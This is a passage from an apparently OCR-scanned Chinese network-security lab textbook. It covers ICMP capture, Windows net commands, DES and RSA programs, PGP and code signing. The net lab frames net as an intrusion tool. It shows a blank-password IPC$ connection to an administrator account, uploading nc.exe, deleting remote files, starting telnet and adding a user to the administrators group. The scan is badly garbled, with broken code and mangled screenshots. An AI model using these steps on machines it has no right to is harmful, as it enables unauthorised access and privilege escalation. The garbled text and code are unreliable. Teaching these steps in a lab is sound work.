UDP 不 能 确保 或 承认 数据 传递 或 序列 化 数据 传递 


B ce 使 用 TCP 的 程序 能 确保 可 靠 的 数据 传输 
UDP 快速 , 贞 有 低 开 铺 要 求 ,并 支持 点 对 点 和 一 | TCP 比较 慢 " 有 更 高 的 开销 要 求 , 而 且 只 支持 点 对 
点 对 多 点 的 通信 点 通信 
UDP 和 TCP 都 使 用 端口 标识 每 个 TCP/IP 程序 的 通信 


实验 5 抓 取 ICMP 的 头 结构 


一 、 实 验 目的 
ping 某 个 网 站 不 通 后 , 抓 取 ICMP 头 结构 。 
二 、 实验 所 需 软件 


客户 机 操作 系统 : Windows XP.IP 地 址 为 192. 168. 2. 1。 

服务 器 操作 系统 : Windows Server 2008/Windows XP.IP 地 址 为 192. 168. 2. 2, 

抓 包 软件 : Sniffer 4.7.5。 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 安装 服务 器 Windows 2000 
Advance Server/Windows XP。 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 


三 、 实 验 步 骤 
(1) 首先 把 主机 的 TP 地 址 设置 为 自动 获取 ,如 图 9-39 所 示 。 


Internet 协议 (ICP/IP) 属性 


an amm 


et TPE EAE E QE. 


© TE RYE QUI 
OSATEN IP HEO 


IP 地 址 区 


图 9-39 修改 主机 IP 地 址 
(2) 然后 启动 Sniffer 并 在 Define Filter 对 话 框 中 ,将 Address 选项 卡 中 的 Stationl 和 
Station2 中 的 IP 地 址 改 为 Any:' 选 择 抓 包 的 类 型 为 IP( 其 他 设置 同 实验 1) ,如 图 9-40 
所 示 。 


à 
Y 


+ 
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(3) 启动 开始 抓 包 后 ,在 DOS 界面 下 ping 一 个 


超时 的 回复 ,如 图 9 


Define Filter — Capture 


Swaey Miress | Data Pattern | Advanced | Buffer | 


Address 


Known Address: Dragsble) 


LI 
8 M Brosdcast/Multicast Address 
b Máress Book 


as 
2-5 
2-5 
3-2 
2-3 


Setting: For: 
Defaut 


图 9-40 设置 抓 包 的 类 型 和 地 址 


41 所 示 。 


NDO) 


Microsoft Windows 


KC》 版 权 所 有 1985-: 


|C: Documents 


\systea32\ 


XP RE 5.1.2600] 
BBI Microsoft Corp. 


流 网 站 如 百度 、 新 浪 


and Settings Midninistrator)ping www.baidu.com 


wwv.a.shifen.com [119.75.218.77] with 32 bytes of data: 


tined 
tined 
tined 
tined 


out. 
out. 
out. 


tatisti 
Packets: 


119.75.218.77: 


4, Received = @, Lost 


[C:\Documents and Settings MAdninistrator 


9-41 


4 41007 loss), 


Ai 


T. 


会 看 到 请 求 


30.2271] 


1 


123 
[392 
222 
da 
22 
EH 
222 
EH 
[2 
ix 


2014-03-16 
3014-05-15 
30s 


Fragment ottset 
Tine to live 
Protocol 

Header checksum 
Source address 
Destination address = [2 
Jio options 


-ksus = E319 


last fressen 
D bytes 
84 seconds rhops 
1 dag) 
2007 (correct 
= [192 16 0.3] 
303271] 


Identifier ~ 1024 
Sequence nunber = 26178 
132 bytes of data] 


图 9-42 显示 数据 包 的 传递 过 程 
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实验 6 net 的 子 命令 
一 、 实 验 目的 


net 命令 是 网 络 命令 中 最 重要 的 一 个 ,必须 透彻 掌握 它 的 每 一 个 子 命令 的 用 法 , 它 的 功 
能 实在 是 太 强大 了 , 它 就 是 微软 提供 的 最 好 的 入 侵 工 具 。 


二 、 实 验 所 需 软件 


客户 机 操作 系统 : Windows 2000/Windows XP,IP 地 址 为 192. 168. 1. 1。 

服务 器 操作 系统 : Windows 2000 Advance Server/ Windows XP,IP 地 址 为 192. 168. 1. 2 。 

实验 时 ,如 果 没 有 两 台 机 器 ,可 以 使 用 虚拟 机 ,在 虚拟 机 下 R3 Ar Windows 2000 
Advance Server/Windows XP。 也 可 以 把 客户 机 和 服务 器 同时 安装 到 虚拟 机 下 。 


三 、 实 验 步骤 


(1) net view 命令 查看 远程 主机 的 共享 资源 。 

CD 客户 机 和 服务 器 的 TP 地 址 如 上 设置 。 

@ 在 客户 机 上 的 DOS 界面 下 输入 “net view \\192. 168. 1. 2”, 如 图 9-43 所 示 ,查看 服 
务 器 的 共享 文件 和 文件 夹 。 


: WINDOWSVsystem32Vcmd. exe 


1.26001 
HA 1985-2001 Microsoft Corp. 


:NDocuments and Settin: dninistrator net view 192.168.1.2 


使 用 为 ”注释 


:NDocuments and SettingsMAdninistrator> 
9-43 net view 显示 共享 资源 


(2) net use 把 远程 主机 的 某 个 共享 资源 映射 为 本 地 盘 符 。 

在 客户 机 上 的 DOS 界面 下 输入 命令 “net use z: \\192. 168. 1. 2\malimei”, 如 图 9-44 所 示 ， 
把 192. 168.1.2 下 的 共享 名 为 malimei 的 目录 映射 为 本 地 的 Z 盘 ,显示 Z 盘 中 的 内 容 。 

(3) 与 远程 计算 机 建立 信任 连接 ,命令 格式 为 “net use \\IP\IPC $ password /user: 
name", 

(D 在 客户 机 上 的 DOS 界面 下 输入 "net use V192. 168. 1. 2MPC $ /user: administrator". 
如 图 9-45 所 示 ,表示 与 192. 168. 1. 2 建立 信任 连接 ,密码 为 空 , 用 户 名 为 administrators È 
立 了 IPC$ 连接 后 ,就 可 以 上 传 文件 了 。 
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\Docunents and Settings\Adninistratormnet use z: *X192.168.1.2*nalimei 


has z 中 的 卷 没 有 标签 
DAFIS E B45P-6669 


Zz:、 的 目 


þpo16-01-28 

þpa16-a1-28 E 

po14-01-21 5,586,298 kerio-urs-5.8.0-rc4-uin.exe 
pora-02-11 58.368 GetNIUser.exe 

pot4-02-10 

pera-02-11 


图 9-44 net use 共享 资源 映射 为 本 地 盘 符 


‘Ynet use \\192.168.1.2\ipc$ /user:adninistrator 


use *192.168.1.2*ipc$ /user:administrator 


N192.168.1.2\ipc$ 
IPC 
OK 


图 9-45 net use 建立 信任 连接 


© 输入 "copy nc. exe Wl 168. 1. 2\ipc$”, 如 图 9-46 所 示 , 表 示 把 本 地 目录 下 的 nc. exe f 
agria 也 可 以 把 远程 服务 器 的 文件 复制 到 客户 端 ,命令 为 "copy \\192. 168. 1 $\ 文 件 
名 c:\”, 表 示 把 远 端 服务 器 的 某 个 文件 复制 到 客户 端的 C 盘 根 目 录 下 ,结合 后 面 要 介绍 到 
el DOS 命令 就 可 以 实现 入 侵 了 


<DIR> 
<DIR> a 
<DIR> AppData 
<DIR> Favori 
<DIR> Funshion 
691 funshion.ini 
<DIR> My Documents 
@ nc.exe 
<DIR> T 
<DIR> D 
x 691 
È 34,919,043, 072 


Documents and Settings Adninistrator?copy nc.exe \\192.168.1.5\ipc$ 


图 9-46 ”建立 信任 连接 后 上 传 文件 
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@ 删除 远 端 服务 器 上 的 文件 ,如 “del \\192. 168. 1. 2\c$ Val. txt" ,表示 删 除 C 盘 上 的 
al. txt 文件 。 

(4) net start 和 net stop 命令 启动 关闭 远程 主机 上 的 服务 。 

在 DOS 命令 下 输入 “net start telnet”, 回 车 就 成 功 启动 了 Telnet 服务 ,如 图 9-47 所 示 。 


C: Documents and Settings Widninistrator)- 


图 9-47 启动 telnet 服务 


如 果 在 以 后 又 发 现 远程 主机 的 某 个 服务 不 需要 了 ,利用 net stop 命令 停 掉 就 可 以 了 ,用 
法 和 net start 相同 。 

(5) net localgroup 查看 所 有 和 用 户 组 有 关 的 信息 并 进行 相关 操作 。 

首先 用 上 面 的 方法 建立 一 个 用 户 ,名字 为 malimei, 密 码 是 1234 。 即 在 DOS 界面 下 输 
A"net user malimei 1234 /add", 

然后 输入 “net localgroup administrators malimei /add” 把 malimei 用 户 加 入 到 
administrators 超级 用 户 组 

最 后 输入 “net user malimei” 查 看 用 户 的 状态 ,如 图 9-48 所 示 。 


malimei 


2016/71728 上 午 
281673711 上 午 


201671728 上 午 11: 
Yes 
Yes 


R11 


从 不 
All 


*fidninistrators 
*None 


图 9-48 ”把 普通 用 户 加 入 到 超级 用 户 组 


(6) net time 查看 远程 服务 器 当前 的 时 间 。 
用 法 : net time \\192. 168. 1. 5, 如 图 9-49 所 示 。 
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Adninistratorynet time \\192.168.1.5 
201471729 FF 12:43 


[C: Documents and Settings\Adninistrator> 


9-49 显示 远程 服务 器 的 时 间 


实验 7 DES 算法 的 程序 实现 


一 、 实 验 目的 


根据 DES 算法 的 原理 ,可 以 方便 地 利用 C 语言 
VC++ 6. 0 环境 下 测试 通过 。 


二 、 实 验 所 需 软件 
在 VC++ 6.0 中 新 建 基于 控制 台 的 Win32 应 用 程序 。 
三 、 实 验 步骤 


: 现 其 加 密 和 解密 算法 。 程 序 在 


# include "memory. h" 
# include "stdio. h" 


enum(ENCRYPT, DECRYPT) ; // ENCRYPT: 加 密 ,DECRYPT: 解 密 
void Des Run(char Out[8], char In[8], bool Type = ENCRYPT); 
// 设置 密 钥 


void Des SetKey(const char Key[8]); 

static void F func(bool In[32], const bool Ki[48]); // £ 函数 

static void S func(boolOut[32], const bool In[48]);  //s 盒 代替 

// 变换 

static void Transform(bool * Out, bool * In, const char * Table, int len); 

static void Xor(bool * InA, const bool * InB, int len); // 异 或 

static void RotateL(bool * In, int len, int loop); // 循环 左 移 

// 字 节 组 转换 成 位 组 

static void ByteToBit(bool * Out, const char * In, int bits); 

// 位 组 转换 成 字 节 组 

static void BitToByte(char * Out, const bool * In, int bits); 

// 置 换 1p d 

const static char IP Table[64] = ( 

58,50,42,34,26,18,10,2,60,52,44, 36, 28, 20,12,4, 

62,54,46, 38,30, 22,14,6,64,56, 48, 40, 32, 24,16,8, 
57,49,41,33,25,17,9,1,59,51, 43, 35, 27,19,11,3, 
61,53,45,37,29,21,13,5,63,55,47,39,31,23,15,7 

}; 

// 逆 置换 TP 

const static char IPR Table[64] = { 
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40,8,48,16,56,24,64,32,39,7,47,15,55,23,63,31, 
38,6,46,14,54,22,62,30,37,5,45,13,53,21,61,29, 
36,4,44,12,52,20,60, 28, 35,3,43,11,51,19,59,27, 
34,2,42,10,50,18,58,26,33,1,41,9,49,17,57,25 
}; 
//E 位 选择 表 


static const char E Table[48] = ( 


H 


32,1,2,3,4,5,4,5,6,7,8,9, 
8,9,10,11,12,13,12,13,14,15,16,17, 
16,17,18,19,20,21, 20,21, 22, 23,24,25, 
24,25,26,27,28,29,28,29,30,31,32,1 


//P 换 位 表 
const static char P Table[32] = ( 


}; 


16,7,20,21,29,12,28,17,1,15,23,26,5,18,31,10, 
2,8,24,14,32,27,3,9,19,13,30,6,22,11,4,25 


/ [PC1 选 位 表 
const static char PC1_Table[56] = { 


h 


57,49,41,33,25,17,9,1,58,50, 42,34, 26,18, 
10,2,59,51,43,35,27,19,11,3,60,52, 44, 36, 
63,55,47,39,31,23,15,7,62,54, 46,38, 30, 22, 
14,6,61,53,45,37,29,21,13,5,28,20,12,4 


//PC2 选 位 表 
const static char PC2_Table[48] = { 


h 


14,17,11,24,1,5,3,28,15,6,21,10, 
23,19,12,4,26,8,16,7,27,20,13,2, 
41,52,31,37,47,55,30, 40,51, 45,33,48, 
44, 49,39,56,34,53, 46,42,50, 36,29,32 


// 左 移 位 数 表 
const static char LOOP_Table[16] = { 


h 


i 1 


/s& 
const static char S Box[8][4][16] = ( 


//8 

14,4,13,1,2,15,11,8,3,10,6,12,5,9,0,7, 
0,15,7,4,14,2,13,1,10,6,12,11,9,5,3,8, 
4,1,14,8,13,6,2,11,15,12,9,7,3,10,5,0, 
15,12,8,2,4,9,1,7,5,11,3,14,10,0,6,13, 
//S2 
15,1,8,14,6,11,3,4,9,7,2,13,12,0,5,10, 
3,13,4,7,15,2,8,14,12,0,1,10,6,9,11,5, 
0,14, 7,11,10,4,13, 1, 5,8,12,6,9,3,2,15, 
13,8,10,1,3,15,4,2,11,6,7,12,0,5,14,9, 
//S3 
10,0,9,14,6,3,15,5,1,13,12,7,11,4,2,8, 
13,7,0,9,3,4,6,10,2,8, 5,14,12,11, 15,1, 
13,6,4,9,8,15,3,0,11,1,2,12,5,10,14,7, 
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h 


1,10,13,0,6,9,8,7,4,15,14,3,11,5,2,12, 
//84 
7,13,14,3,0,6,9,10,1,2,8,5,11,12,4,15, 
13,8,11,5,6,15,0,3,4,7,2,12,1,10,14,9, 
10,6,9,0,12,11,7,13,15,1,3,14,5,2,8,4, 
3,15,0,6,10,1,13,8,9,4,5,11,12,7,2,14, 
//85 
2,12,4,1,7,10,11,6,8,5,3,15,13,0,14,9, 
14,11,2,12,4,7,13,1,5,0,15,10,3,9,8,6, 
4,2,1,11,10,13,7,8,15,9,12,5,6,3,0,14, 
11,8,12,7,1,14,2,13,6,15,0,9,10,4,5,3, 
//86 
12,1,10,15,9,2,6,8,0,13,3,4,14,7,5,11, 
10,15,4,2,7,12,9,5,6,1,13,14,0,11,3,8, 
9,14,15,5,2,8,12,3,7,0,4,10,1,13,11,6, 
4,3,2,12,9,5,15,10,11,14,1,7,6,0,8,13, 
//S7 
4,11,2,14,15,0,8,13,3,12,9,7,5,10,6,1, 
13,0,11,7,4,9,1,10,14,3,5,12,2,15,8,6, 
1,4,11,13,12,3,7,14,10,15,6,8,0,5,9,2, 
6,11,13,8,1,4,10,7,9,5,0,15,14,2,3,12, 
//s8 
13,2,8,4,6,15,11,1,10,9,3,14,5,0,12,7, 
1,15,13,8,10,3,7,4,12,5,6,11,0,14,9,2, 
7,11,4,1,9,12,14,2,0,6,10,13,15,3,5,8, 
2,1,14,7,4,10,8,13,15,12,9,0,3,5,6,11 


static bool SubKey[16][48]; 
void Des Run(char Out[8], char In[8], bool Type) 


{ 


static bool M[64], Tmp[32], *Li = &M[0], *Ri 
ByteToBit(M, In, 64); 

Transform(M, M, IP_Table, 64); 

if(Type == ENCRYPT) { 


for(int i=0; i«16; i++) ( 
memcpy(Tmp, Ri, 32); 
F func(Ri, SubKey[i]); 
Xor(Ri, Li, 32); 
memcpy(Li, Tmp, 32); 
) 


Jelse( 


} 


for(inti-15; i»-0; i--) ( 
memcpy(Tmp, Li, 32); 
F func(Li, SubKey[i]); 
Xor(Li, Ri, 32); 
memcpy(Ri, Tmp, 32); 


Transform(M, M, IPR Table, 64); 
BitToByte(Out, M, 64); 


// 16 圈子 密 钥 


&M[32]; 
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void Des SetKey(const char Key[8]) 


{ 
static bool K[64], * KL = &K[0], *KR = &K[28]; 
ByteToBit(K, Key, 64); 
Transform(K, K, PC1 Table, 56); 
for(int i=0; i«16; i+) { 
RotateL(KL, 28, LOOP Table[i]); 
RotateL(KR, 28, LOOP Table[i]); 
Transform(SubKey[i], K, PC2 Table, 48); 
) 
J 


void F_func(bool In[32], const bool Ki[48]) 
{ 
static bool MR[48]; 
Transform(MR, In, E_Table, 48); 
Xor(MR, Ki, 48); 
S_func(In, MR); 
Transform( In, In, P_Table, 32); 
} 
void S_func(bool Out[32], const bool In[48]) 
{ 
for(char i=0,j,k; i«8; i++, In+=6,0ut += 4) ( 
j = (In[0]<<1) + In[5]; 
k = (In[1]<<3) + (In[2]<<2) + (In[3]<<1) + In[4]; 
ByteToBit(Out, &S Box[i][j][k], 4); 


) 
void Transform(bool * Out, bool * In, const char * Table, int len) 
{ 
static bool Tmp[256]; 
for(int i=0; i< len; i++) 
Tmp[i] = In[ Table[i]- 1 ]; 
memcpy(Out, Tmp, len); 


} 
void Xor(bool * InA, const bool * InB, int len) 
( 
for(int i=0; i< len; i++) 
InA[i] ^= InB[i]; 
} 


void RotateL(bool * In, int len, int loop) 
{ 

static bool Tmp[ 256]; 

memcpy(Tmp, In, loop); 

memcpy( In, In+ loop, len- loop); 

memcpy(In + len- loop, Tmp, loop); 
} 
void ByteToBit(bool * Out, const char * In, int bits) 
{ 

for(int i=0; i<bits; i++) 

Out[i] = (In[i/8]>(i%8)) &1; 


) 
void BitToByte(char * Out, const bool * In, int bits) 
{ 

memset(Out, 0, (bits + 7)/8); 
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for(int i=0; i«bits; i++) 
Out[i/8] | = In[i]<<(i% 8); 
} 
void main() 
( 
char key[8] = (1,9,8,0,9,1,7,2), str[] = "test"; 
puts("Before encrypting"); 
puts(str); 
Des SetKey(key) ; 
Des Run(str, str, ENCRYPT); 
puts("After encrypting"); 
puts(str); 
puts("After decrypting"); 
Des Run(str, str, DECRYPT); 
puts(str); 
} 


四 、 实 验 结果 


设置 一 个 密 钥 为 数组 char key[8] 二 {1,9,8,0,9,1,7,2), 要 加 密 的 字符 串 数组 是 
str\[]=" test", HIH Des_SetKey(key) 设 置 加 密 的 密 钥 ,调用 Des_Run(str, str, ENCRYPT) 对 
输入 的 明文 进行 加 密 , 其 中 第 一 个 参数 str 是 输出 的 密 文 ,第 二 个 参数 str 是 输入 的 明文 , 枚 
举 值 ENCRYPT 设置 进行 加 密 运 算 。 程 序 执行 的 结果 如 下 所 示 。 

Before encrypting 

test 

After encrypting 

T] :c<F © 

After decrypting 

test 

Press any key to continue 


实验 8 RSA 算法 的 程序 实现 


一 、 实 验 目的 


根据 RSA 算法 的 原理 ,可 以 利用 C 语言 实现 其 加 密 和 解密 算法 。RSA 算法 比 DES 算 
法 复杂 ,加 解密 所 需要 的 时 间 也 比较 长 。 


二 、 实 验 所 需 软 件 


(D VC++ 6.0, 
(2) 操作 系统 为 Windows XP 或 者 Windows Server. 


三 、 实 验 步骤 


利用 RSA 算法 对 文件 加 密 和 解密 。 算 法 根据 设置 自动 产生 大 素数 p Aa ,并 根据 pl 
q 的 值 产 生 模 (z)、 公 钥 (e) 和 密 钥 (d) ,利用 VC++ 6. 0 实现 核心 算法 ,如 图 9-50 所 示 。 
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Smg mcshead. 
© Œ Globals 


9-50 算法 的 实现 


编译 执行 程序 ,如 图 9-51 所 示 。 该 窗口 提供 的 功能 是 对 未 加 密 的 文件 进行 加 密 , 并 可 
以 对 已 经 加 密 的 文件 进行 解密 。 


图 9-51 RSA 加 密 主 界面 
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在 图 9-51 中 单 击 “ 产 生 RSA 密 钥 对 ?按钮 ,在 出 现 的 对 话 框 中 首先 产生 素数 p 和 素数 
gq， 如 果 产 生 100 位 长 度 的 p 和 9g ,大约 分 别 需 要 10s 左右 ,产生 的 素数 如 图 9-52 所 示 。 


100 100 200 


175C3C81EETF8BCO9FOGAA2EE4FAGEEEFBCBE08BOTFCBAA19E656D51793FDECOBTCC 


[5E6E7DD6DF52E34312115FF82291F5E36E094F755AC50926EDT715CF3210C85E98CB9 


图 9-52 产生 素数 p 和 g 
利用 素数 p 和 g 产生 密 钥 对 ,产生 的 结果 如 图 9-53 所 示 。 


Es 


ee [em supo | free roe 


xj 


[DBOÜFÜE3ED853BE | BETFD625366068538F6EAD33A60594E22CE3829 1F90ADD04248172 | 


ID9328E706AD134AF991F9114BD6EES8E39228B2FF50194982071DOFO1CTCTF542AEFDC 


图 9-53 FERHAN 


UIRE RKR n AR e 和 私密 d 导出 ,并 保存 成 文件 ,加 密 和 解密 的 过 程 中 要 用 到 
这 三 个 文件 。 其 中 , 模 n 和 私密 d 用 来 加 密 , 模 nn MAR e 用 来 解密 。 将 三 个 文件 分 别 保 
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存 , 如 图 9-54 所 示 。 


公害 .txt 模 n.txt 私密 -txt 
图 9-54 三 个 加 密 文件 


在 主 界面 中 选择 一 个 文件 ,并 导入 “ 模 n txt" 文 件 到 RSA" BE n” 文 本 框 ,导入 “私密 . 
txt” 文 件 或 者 “ 公 密 . txt”, 加 密 如 果 用 “私密 . ox" ,那么 解密 的 过 程 就 用 “ 公 密 . txt”。 反 
之 依然 ,加 密 过 程 如 图 9-55 所 示 。 加 密 完 成 以 后 ,自动 产生 一 个 加 密 文 件 ,如 图 9-56 
所 示 。 


LII EC Anis 
[输入 /输出 
输入 文件 [C:\Documents and Settings VAdninistratorVR II VI Wait. txt 浏览 文件 
输出 文件 [C:\Documents and Settings MAdninistrator JE. 3 Wwait.txt.mcs 选择 目录 
T MR ZO 


默认 路 径 TREE 


wes 


RSAWHA (199) [D9TB8AA2F2F IEdF9DEAOED TC5E375B854F486BD98B75594921504B93D94272T3ED1Ad «RA | 
RSAin (200) |BF745DCBOB5397346044C542330936CF9EODF9EBB4A37393304A250A122FFB24A3ECA 《< 导入 | 
厂 他 用 3 次 DESh0 密 eteo, r CE x) 


G) ms mne. | 
DES 


DESE [ 


WUER 


met |c mae — conto 
厂 EARE 
T WERDE F BERNER 


wE 产生 RSA 密 钥 对 退出 


图 9-55 加 密 过 程 
test.ixt test.txL mcs 


A 9-56 源 文件 和 加 密 文件 


解密 过 程 要 在 输入 文件 对 话 框 中 输入 已 经 加 密 的 文件 ,按钮 “加 密 ” 自 动 变 成 “解密 ”。 
选择 “ 模 n. txt”" 和 密 钥 ,解密 过 程 如 图 9-57 所 示 。 
解密 成 功 以 后 ,查看 原文 件 如 图 9-58 所 示 ,解密 后 的 文件 如 图 9-59 所 示 。 


209 


Id 
「 输 入 /输出 
输入 文件 FE:\Docunents and Settings\Administrator\ 桌 面 \ 加 密 \wait. tzt. ncs 浏览 文件 
输出 文件 [C:\Documents and Settings Administrator EIE ITE \vait1. txt 选择 目录 
T ERE EUER 


默认 路 径 HSER 


[NS 


RsA 密 铜 (200) [549305374D21A1CT2CB49D9095D1D042813375C14907CC4533716T2C24064E030b905 «GA 
RSA 模 n (200) [BF745DCBOB5397346044C542330936CF9E0DF9EBB4A373933044250A122FFB2443ECA «CFA 


mense 
T 加 密 后 山 除 原文 件 
T 解密 后 删除 加 密 文 件 。 证 删除 前 提示 


RAIE 


F DESWE 


JEE | 


产生 R54 密 钥 对 


退出 


P test.tzt - 记事 本 


图 9-57 解密 过 程 


FO 编辑 到) 格式 @) EV 帮助 中 
abc123456789| 


图 9-58 源 文件 
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P test1.txt - 记事 本 
XED MEO PLO SEV SED 


图 9-59 解密 后 的 文件 


实验 9 PGP 加密 文件 和 邮件 


一 、 实 验 目 的 
使 用 PGP 软件 可 以 简捷 高 效 地 实现 邮件 或 者 文件 的 加 密 、 数 字 签 名 。 
二 、 实 验 所 需 软件 


(1) 操作 系统 为 Windows XP 或 者 Windows Server。 
(2) 工具 软件 : PGP 8.1. 


、 实 验 步 骤 


1. 使 用 PGP 加 密 文件 

教材 4. 4. 2 节 已 经 介绍 了 软件 的 安装 和 密 钥 的 产生 ,这 里 就 不 再 重复 ,使 用 PGP 可 
以 加 密 本 地 文件 , 右 击 要 加 密 的 文件 ,选择 PGP 菜单 项 中 的 菜单 Encrypt, 如 图 9-60 
所 示 。 

出 现 对 话 框 ,让 用 户 选择 要 使 用 的 加 密 密 钥 . 选 中 所 需要 的 密 钥 , 单 击 OK 按钮 ,如 图 9-61 
所 示 。 

目标 文件 被 加 密 了 ,在 当前 目录 下 自动 产生 一 个 新 的 文件 ,如 图 9-62 所 示 。 

打开 加 密 后 的 文件 时 ,程序 自动 要 求 输入 密码 ,输入 建立 该 密 钥 时 的 密码 ,如 图 9-63 
所 示 。 


[ems 


图 9-60 选择 要 加 密 的 文件 


图 9-61 选择 密 钥 


2. 使 用 PGP 加 密 邮件 

PGP 的 主要 功能 是 加 密 邮 件 , 安 装 完毕 后 ,PGP 自动 和 Outlook 或 者 Outlook Express 
关联 。 和 Outlook Express 关联 如 图 9-64 所 示 。 

利用 Outlook 建立 邮件 ,可 以 选择 利用 PGP 进行 加 密 和 签名 ,如 图 9-65 所 示 。 
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= 新 建文 件 夫 
XPO RED SEV (Go) IAV HW 
Qa- O- i$ Om px Gu 
地 址 加 ) [E E: \nalinei\ 新 建文 件 天 
[7 
XeRUMXGA G) Vortiee a) EP. 
E: 
m] Eszt 
B emare 
复制 这 个 文件 
O 将 这 个 文件 发 布 到 Yeb 
O Urat 
ia "HT 


其 它 位 轩 
ae malimei. 
O Ris 
DO sexe 


9-63 ”解密 文件 时 要 求 输入 密码 


| Bf Outlook Express 
| ZO SO SEW 工具 (D 邮件 (MW) EIH 


e Alg G. g 
E | EDEN 通讯 等 。 查找 PGpkeys 


»* Outlook Express 


文件 来 x 
[SA Outlook Express. 
EO 本 地 文件 来 

Q RHE CO 

Gata 

A 已 发 送 邮件 

全 已 删除 邮件 

Dan 


联系 人 (中 ~ x 


没有 联系 人 可 旺 示 。 在 :联系 人 "上 单 
drae- TEUER A. [EER 


E ‘=la xl 
| 文件 (E) EC) EEV 插入 (D ”格式 (0) IAW 邮件 (WD FHD B 
| 5 8 5Sl& T 


Ey Encrypt Message (S/MIME) 
EL. 
| =| $ Encrypt Message (PSP) 
ULL —C' BJ Soressi (Pa) 


BË paneys 


图 9-65 ”加密 邮件 


实验 10 ”数字 签名 
一 、 实 验 目 的 
CD 确认 信息 是 由 签名 者 发 送 的 ; 
(2) 确认 信息 自 签 名 后 到 收 到 为 止 , 未 被 修改 过 ; 
(3) 签名 者 无 法 否认 信息 是 由 自己 发 送 的 。 
二 、 实 验 所 需 软 件 


CD 操作 系统 为 Windows 7/Vista/XP。 
(2) 工具 软件 : 亚洲 诚信 数字 签名 工具 V2. 1 专业 版 。 
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三 、 软 件 介 绍 


图 形 化 数字 签名 工具 专业 版 ,支持 应 用 程序 数字 签名 、ActiveX 控件 数字 签名 、64 位 驱 
动 程序 数字 签名 ,包含 微软 签名 工具 的 所 有 功能 。 特 色 功 能 签名 测试 : 内 置 免费 测试 证 书 ， 
- 键 安装 和 签名 测试 。 证 书 管理 : 随时 对 证 书 进行 备份 和 恢复 。 签 名 规则 : 独创 签名 规 
则 ,一 键 式 数 字 签名 。 数 字 签 名 : 代码 签名 ,驱动 签名 一 应 俱全 ,支持 文件 或 文件 夹 直 接 拖 
WEA. PERIERE: 内 置 VeriSign. Thawte 时 间 戳 服务 器 。 签 名 校 验 : 签名 状态 检查 ,确保 
数字 签名 有 效 性 。 


1. 软件 安装 和 启动 

安装 “亚洲 诚信 数字 签名 工具 V2.0 专业 版 ”文件 ,安装 简单 , 单 击 “ 是 ”按钮 升级 到 V2. 1 
版 本 ,升级 安装 完成 后 ,在 桌面 产生 文件 名 为 数字 签名 工具 的 快捷 方式 , 单 击 快捷 方式 ,启动 
签名 工具 ,如 图 9-66 所 示 。 


m 数字 签名 工具 专业 版 
亚洲 减 信 数 字 签 名 工具 专业 版 


Iso z ETT UMS TES 
Q9 amnis Q 产品 帮助 
功能 介绍 国 言 方 博客。 Bera 
its: AANGE. REN 
新 手指 南 
ERAN: HOREA, * 号 入 证 书 
20150610 v2.1.0 - 
数字 签名 ; 代码 签名 、 驱 动 * * 备份 证 书 


TT 
Zia: 签名 拟态 检查 ， ms 。 SEE EUR 


ise 
~ * 数字 签名 证 书 购买 
至 - 


P d ace eer auo 


»— 数字 签名 工具 专业 版 1 0 发 布 


[当前 规则 ] 


图 9-66 升级 安装 界面 


2. 证 书 管理 设置 

单 击 图 9-66 中 的 “证 书 管理 ”标签 , 单 击 左 下 角 的 “安装 测试 证 书 ” 按 钮 ,完成 测试 证 书 
的 安装 ,如 图 9-67(a) 所 示 。 

3. 签名 规则 设置 

单 击 图 9-66 中 的 “签名 规则 ”标签 , 单 击 右 下 角 的 “添加 ”按钮 ,添加 规则 名 证书 、 要 添 
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加 数字 证 书 的 文件 的 扩展 名 ,选中 复 选 框 将 时 间 戳 添加 到 数据 中 ,选择 时 间 戳 服务 , 单 击 “ 确 
定 ?按钮 ,如 图 9-67(b) 所 示 。 


m 数字 签名 工具 专业 版 


亚洲 减 信 数 字 签 名 工具 专业 版 


man | EREE amm [mss | 
mei [77] 开始 日 其 ELAM 
代码 签名 证 书 


亚洲 诚信 代码 签名 测试 证 书 SHA2 TrustAsia SHA2 Code Signing CA 2015-03-01 
3ERNTS OIAE WM IRCUES 


2018-03-30 
TrustAsia Code Signing CA 2015-01-01 


2017-12-30 


[当前 规则 ] REP ES) 
(a) 安装 测试 证 书 


| =” 数字 签名 工具 专业 版 


亚洲 诚信 数字 签名 工具 专业 版 


欢迎 页 | 证 书 管理 ] 签名 规则 n: 
规则 名 称 — us -= 
JAN TRER. | mme 
ZUR 
is 
(ranes w) [ss] 
pure —- [D Ria BOE UR 
exe;*.dil;*.ocx; *.sys; *.cat; *.cab; *.msi; 
= 数字 签名 时 多 许 操作 的 文件 WES. uu 


回 包 合子 目录 口 跳 过 有 效 签名 文件 


EZE) 
内 容 描述 : 
putty 


信息 URL: 


| Gies i 


(b) 签名 规则 的 设置 


9-67 ”签名 设置 
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各 数字 签名 工具 专业 版 


亚洲 诚信 数字 签名 工具 专业 版 


欢迎 页 | 证 书 管理 | 签名 规则 | 数字 签名 | 关于 


文件 修改 时 间 
a C: Documents and Settings Wdministrator V8 (E putty.exe 2016-02-18 12:30:14 


> 


窗口 年 页 【添加 文件 W ] [sme] (eso ] ( 中 mI 具 ] 


[当前 规则 ] A 


(c) 数字 签名 的 设置 


图 9-67 ( 续 ) 


4. 数字 签名 

单 击 图 9-66 中 的 “数字 签名 ”标签 , 单 击 左 下 角 的 “添加 文件 "按钮 ,添加 要 数字 签名 的 
文件 , 单 击 “ 数 字 签 名 ”按钮 ,启动 模式 选择 ,选择 “应 用 模式 ”, 如 图 9-67(c) 所 示 。 

显示 签名 成 功 , 单 击 右 下 角 的 “签名 验证 ”按钮 ,显示 签名 有 效 , 如 图 9-68 所 示 。 


m 数字 签名 工具 专业 版 
洲 诚 信和 数字 签名 工具 专业 版 


上 证书 管 理 | acu [EE | 关于 | 


< 


口 窗口 置顶 [添加 文件 ] [sme] [_ 洁 空 Q 


[当前 规则 ] ， 规 则 1 


9-68 ”签名 成 功 
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5. 验证 


zn | 版 本 【兼容 性 
签名 列表 


FA ”| 详细 信息 [证 书 路 径 | 


证 书信 息 


这 个 证 书 的 目的 如 下 : 
“确保 软件 来 自 软件 发 行商 
* 保护 软件 在 发 行 后 不 被 改动 。 


MR: 。 亚洲 诚信 代码 签名 测试 证 书 
MRE: 。 Trusthsis Code Signing CA 


Srasatec Tin, 有 效 起 始 日 期 2015-1-1 到 2017-12-30 


确定 


图 9-69 验证 数字 签名 


实验 11 用 WinRouteFirewall 5 创建 包 过 滤 规 则 


